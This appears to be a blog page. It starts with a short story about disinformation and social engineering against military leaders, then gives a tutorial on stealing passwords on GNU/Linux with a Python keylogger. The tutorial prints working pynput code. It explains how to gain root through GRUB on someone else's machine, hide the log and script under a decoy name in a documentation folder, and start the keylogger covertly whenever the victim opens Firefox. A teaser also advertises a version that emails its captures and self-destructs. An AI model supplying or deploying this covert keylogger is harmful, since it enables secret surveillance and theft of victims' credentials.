The battle of Usonansk

This story is based on real events. Identifying information has been distorted.

“According to the sources we have, they plan to focus their forces in this region”. Little did the generals know that their sources had been intentionally poisoned with false information. Something quite different happened.

It turns out that certain military and high-ranking people were doing research on the region that was going to be attacked, leaving a digital trail that allowed the enemy to confirm that they had swallowed their false information. They had found weaknesses in the chain of command and would not fail to exploit them. Some of these people were stubborn and had long careers, so they had no interest in leaving their high positions, despite their successive mistakes. Thus, they suffered social engineering attacks.

The social circle of key people was highly monitored to obtain all kinds of information, identify weak points, etc. The danger of direct confrontation and the fear of escalating the conflict were some of the weaknesses identified in the enemy.

On August 14, they received a surprise attack that went around the world. Their hasty response was discussed, very thoroughly in important offices. They were losing credibility and power by leaps and bounds. No-one believed in victory. They were pulling their money out of stocks and banks, out of those places they thought so safe.

They were severely infected by parasites who lived off them and let the cat out of the bag, waging internal struggles... The huge giant had feet of clay.

Python keylogger for GNU/Linux. Send information by email and self-destruct

In this article I show you how to program an advanced keylogger that sends messages by email and self-destructs after a certain date.

Keep reading Python keylogger for GNU/Linux. Send information by email and self-destruct

Basic keylogger for GNU/Linux to steal passwords and typed information

A simple way to steal passwords is to install a keylogger on the victim's computer. I am going to show how to do this on GNU/Linux using the Python programming language.

The first thing to do is to obtain superuser permissions. If the computer is managed by us, we already know the password. If not, we can get superuser access from GRUB. With the necessary permissions, we are free to install the keylogger.

First of all, the pynput library must be installed executing...

sudo pip install pynput

Next, we need to write the keylogger. This is the code we will use:

#!/usr/bin/env python3
from pynput.keyboard import Key, Listener
import logging

log_dir = "/usr/share/doc/python3/"

logging.basicConfig(filename=(log_dir + "log"), \
        level=logging.DEBUG, format='%(asctime)s: %(message)s')

def on_press(key):
    logging.info(str(key))

with Listener(on_press=on_press) as listener:
    listener.join()

The keylog is stored in log_dir. In this case, I have specified the GNU/Linux Python 3 documentation folder. The keylogger can also be stored in the same directory, perhaps with the name compile_docs.py or something similar to avoid attracting attention. Ideally, choose a folder that the victim is not going to enter to prevent them from realising what we are doing.

The last step would be to run the program every time the computer is turned on or a program is started without the victim noticing. If, for example, we want to start the keylogger every time the user opens Firefox, we can modify the Firefox command. Keep reading Basic keylogger for GNU/Linux to steal passwords and typed information